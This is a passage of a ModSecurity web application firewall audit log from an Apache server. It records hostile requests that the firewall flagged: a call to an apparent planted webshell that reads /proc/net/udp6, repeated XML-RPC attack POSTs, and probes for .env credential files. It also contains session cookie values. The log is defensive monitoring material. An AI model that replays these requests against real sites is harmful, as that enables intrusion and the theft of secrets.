Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b9e97ec68bdfe75e336f91b8c873f0%7C%7C1750160175%7C%7C1750156575%7C%7C47f8211759ebb3a488a15b30a2a23db3; expires=Tue, 17 Jun 2025 11:36:15 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=172d7a8c030f532256b68a19c41eacc7%7C%7C1750160175%7C%7C1750156575%7C%7C7f3f44c7376ab48a0bc7375efe79514c; expires=Tue, 17 Jun 2025 11:36:15 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5de7a531-E-- --5de7a531-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6wLlirsA1ruSKrNWSVKQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987374768845 1082346 (- - -) Stopwatch2: 1749987374768845 1082346; combined=3307, p1=396, p2=2380, p3=139, p4=46, p5=217, sr=95, sw=129, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5de7a531-Z-- --4cf8d13b-A-- [15/Jun/2025:17:06:48.132014 +0530] aE6wUDS8xKUOR1xBR5bp8AAAAAM 54.89.90.224 49656 127.0.0.1 7081 --4cf8d13b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/net&viewfile=//proc/net/udp6 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.89.90.224 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --4cf8d13b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3164 Connection: close Content-Type: text/html; charset=UTF-8 --4cf8d13b-H-- Message: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/net/udp6"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/net/udp6"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6wUDS8xKUOR1xBR5bp8AAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749987408128703 3363 (- - -) Stopwatch2: 1749987408128703 3363; combined=1779, p1=278, p2=1381, p3=36, p4=30, p5=54, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4cf8d13b-Z-- --b56d2f15-A-- [15/Jun/2025:17:07:14.241047 +0530] aE6waVu1-lKBbvo2E9pB0QAAAAw 185.177.72.144 55346 127.0.0.1 7081 --b56d2f15-B-- GET /app/.env HTTP/1.0 Host: www.best-website-designs.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b56d2f15-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://best-website-designs.com/app/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --b56d2f15-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.best-website-designs.com"] [uri "/app/.env"] [unique_id "aE6waVu1-lKBbvo2E9pB0QAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987433291606 949506 (- - -) Stopwatch2: 1749987433291606 949506; combined=1653, p1=338, p2=1228, p3=0, p4=0, p5=86, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b56d2f15-Z-- --80d15f07-A-- [15/Jun/2025:17:07:15.826550 +0530] aE6walCip1xXG9qkRMdtuQAAAAc 165.22.247.248 55404 127.0.0.1 7081 --80d15f07-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=i6snrci9nm9tnta2pcvlcnnlie; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b7114896819be258b63ffb12b1699e%7C%7C1750160234%7C%7C1750156634%7C%7Ca0061db4a5e09a097c9b575044136193; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=257c3d65275b3dddbe3734193b2c73e5%7C%7C1750160234%7C%7C1750156634%7C%7C93c5e353bbbd3b8eb82d19c174031930 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --80d15f07-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=n1t2smgq5iu0pbuau1cksonsj1; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_bda32308927c245d4b6be85187cdb1%7C%7C1750160235%7C%7C1750156635%7C%7C32b131956060f57bc711e9aea17927b2; expires=Tue, 17 Jun 2025 11:37:15 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=233a5a08dd48a8e51195b38a827bcbcc%7C%7C1750160235%7C%7C1750156635%7C%7Cb46f7e56d2448c3e2b087eb1b946c402; expires=Tue, 17 Jun 2025 11:37:15 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --80d15f07-E-- --80d15f07-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6walCip1xXG9qkRMdtuQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987434775189 1051442 (- - -) Stopwatch2: 1749987434775189 1051442; combined=2762, p1=358, p2=1971, p3=107, p4=36, p5=178, sr=89, sw=112, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --80d15f07-Z-- --98aef553-A-- [15/Jun/2025:17:08:15.920946 +0530] aE6wpmah4jZQMChzmsaB1AAAAAI 165.22.247.248 52648 127.0.0.1 7081 --98aef553-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=hbhmeithrfmlpiva2ipog3r1gr; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c991964689c0195ce8db38618352db%7C%7C1750160294%7C%7C1750156694%7C%7Ca36b1303c0d2e1c462302efc472751b0; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=2677d969ee43a3bcca3c8ff2bd5e4366%7C%7C1750160294%7C%7C1750156694%7C%7C3ad19320303b493902e301b222e863da User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --98aef553-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=1h9pk086af8intmoqg4aug50mb; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_3c70bc1d7f96ede333d23eede1d3f6%7C%7C1750160295%7C%7C1750156695%7C%7C11b8b1f31d7b7410e2f27ae6b5d556b4; expires=Tue, 17 Jun 2025 11:38:15 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=693680ef1bb5f2907902a59ce9094d61%7C%7C1750160295%7C%7C1750156695%7C%7Ca6dc7915e1dbdfe755997dc165c267d8; expires=Tue, 17 Jun 2025 11:38:15 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --98aef553-E-- --98aef553-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6wpmah4jZQMChzmsaB1AAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987494887273 1033766 (- - -) Stopwatch2: 1749987494887273 1033766; combined=3253, p1=480, p2=2388, p3=96, p4=33, p5=163, sr=123, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98aef553-Z-- --a7fc7111-A-- [15/Jun/2025:17:09:16.052916 +0530] aE6w4xRnvL96XFagPFC5QgAAAAY 165.22.247.248 53454 127.0.0.1 7081 --a7fc7111-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=m9vu0ofvfj1tk464lamgus7drh; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_a858c40331def147b5e29147a2f4ed%7C%7C1750160354%7C%7C1750156754%7C%7C73ea2223870919e691786cf6b145dc3d; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=2e4a085030824a75d132878c65e099e3%7C%7C1750160354%7C%7C1750156754%7C%7Cc2a32df925a30360b7be02f78d946d48 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a7fc7111-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=brnpkkav73reok6ldgc46vr6i8; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_8ccbff1e1f5982fc3b12c25b726c2a%7C%7C1750160355%7C%7C1750156755%7C%7C21df71384f1b3186ca165a6bf753cd52; expires=Tue, 17 Jun 2025 11:39:15 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=765200df2249a96e2c24ac6b44a6cadb%7C%7C1750160356%7C%7C1750156756%7C%7C4d9d2505cf0ef314e0a5a868e23da7cd; expires=Tue, 17 Jun 2025 11:39:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a7fc7111-E-- --a7fc7111-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6w4xRnvL96XFagPFC5QgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987555026855 1026150 (- - -) Stopwatch2: 1749987555026855 1026150; combined=3458, p1=447, p2=2525, p3=141, p4=40, p5=187, sr=106, sw=118, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a7fc7111-Z-- --eb2bda30-A-- [15/Jun/2025:17:10:16.593218 +0530] aE6xHw2U8ofTdsKp_yhLbAAAAAU 165.22.247.248 48902 127.0.0.1 7081 --eb2bda30-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=l0mpt90r4h25ts9k671of28vb6; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d46e61781bd38c6e197ea0092dce67%7C%7C1750160414%7C%7C1750156814%7C%7Cde50d172212f2bc9ceb6d4bb89cf74c8; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=072a4e1b1610bcd94db083ad96fdf4c7%7C%7C1750160415%7C%7C1750156815%7C%7C52ba3419127ce57726fc6aab321ee6c2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --eb2bda30-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=nem9m2ko545vkmjkiau2l07fer; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_3cdb92c1cdb16e2094fe3b3492fb99%7C%7C1750160416%7C%7C1750156816%7C%7C42012bd46fe9bc01b0331f0d5f6346e3; expires=Tue, 17 Jun 2025 11:40:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=fa6465b4f69c996f8da41d8e210db3b4%7C%7C1750160416%7C%7C1750156816%7C%7C171d8f411bffeb00767dabf957a80036; expires=Tue, 17 Jun 2025 11:40:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --eb2bda30-E-- --eb2bda30-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6xHw2U8ofTdsKp_yhLbAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987615473143 1120163 (- - -) Stopwatch2: 1749987615473143 1120163; combined=3135, p1=386, p2=2077, p3=94, p4=42, p5=303, sr=100, sw=233, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eb2bda30-Z-- --6aea3823-A-- [15/Jun/2025:17:11:16.834900 +0530] aE6xW1irsA1ruSKrNWSVtgAAAAQ 165.22.247.248 34204 127.0.0.1 7081 --6aea3823-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=tfq3otlq0hag1pobfobhnrig4j; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_417e5fe2b71349733db74444b7d782%7C%7C1750160475%7C%7C1750156875%7C%7Cbc4f0c2dc5783062ecbb45199c2b1a3c; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=2f95299b44e288bcd7ab8f6a61493b2c%7C%7C1750160475%7C%7C1750156875%7C%7Cc17f95fd6ed16a63a0522a6458d0e85d User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --6aea3823-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=8qp0v2c9vloo23e0hsftv7nh2d; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e288f9f7405166d0cf458272117283%7C%7C1750160476%7C%7C1750156876%7C%7C177bff7a31782ad1eadfaab316d15f95; expires=Tue, 17 Jun 2025 11:41:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a1a5e9ede6c1e4b41faab36302119fd7%7C%7C1750160476%7C%7C1750156876%7C%7C2e7211e7af1c584409f24f91ba0b5d1a; expires=Tue, 17 Jun 2025 11:41:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6aea3823-E-- --6aea3823-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6xW1irsA1ruSKrNWSVtgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987675756344 1078636 (- - -) Stopwatch2: 1749987675756344 1078636; combined=2900, p1=443, p2=2057, p3=108, p4=42, p5=157, sr=98, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6aea3823-Z-- --5be6847b-A-- [15/Jun/2025:17:11:42.871582 +0530] aE6xdlirsA1ruSKrNWSVwQAAAAQ 91.232.140.197 34384 127.0.0.1 7080 --5be6847b-B-- GET /.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --5be6847b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5be6847b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env"] [unique_id "aE6xdlirsA1ruSKrNWSVwQAAAAQ"] Stopwatch: 1749987702868452 3188 (- - -) Stopwatch2: 1749987702868452 3188; combined=1967, p1=420, p2=1442, p3=27, p4=26, p5=52, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5be6847b-Z-- --74ec8426-A-- [15/Jun/2025:17:11:43.080746 +0530] aE6xdkca6QMKkQvLlAAqfwAAAAk 91.232.140.197 34398 127.0.0.1 7080 --74ec8426-B-- GET /.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --74ec8426-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --74ec8426-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.bak"] [unique_id "aE6xdkca6QMKkQvLlAAqfwAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.env.bak"] [unique_id "aE6xdkca6QMKkQvLlAAqfwAAAAk"] Stopwatch: 1749987702999175 81633 (- - -) Stopwatch2: 1749987702999175 81633; combined=158632, p1=389, p2=1564, p3=27, p4=26, p5=78353, sr=114, sw=0, l=0, gc=78273 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --74ec8426-Z-- --a2065a63-A-- [15/Jun/2025:17:11:43.133364 +0530] aE6xdxRnvL96XFagPFC5kgAAAAY 91.232.140.197 34406 127.0.0.1 7080 --a2065a63-B-- GET /app/config/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --a2065a63-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2065a63-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file 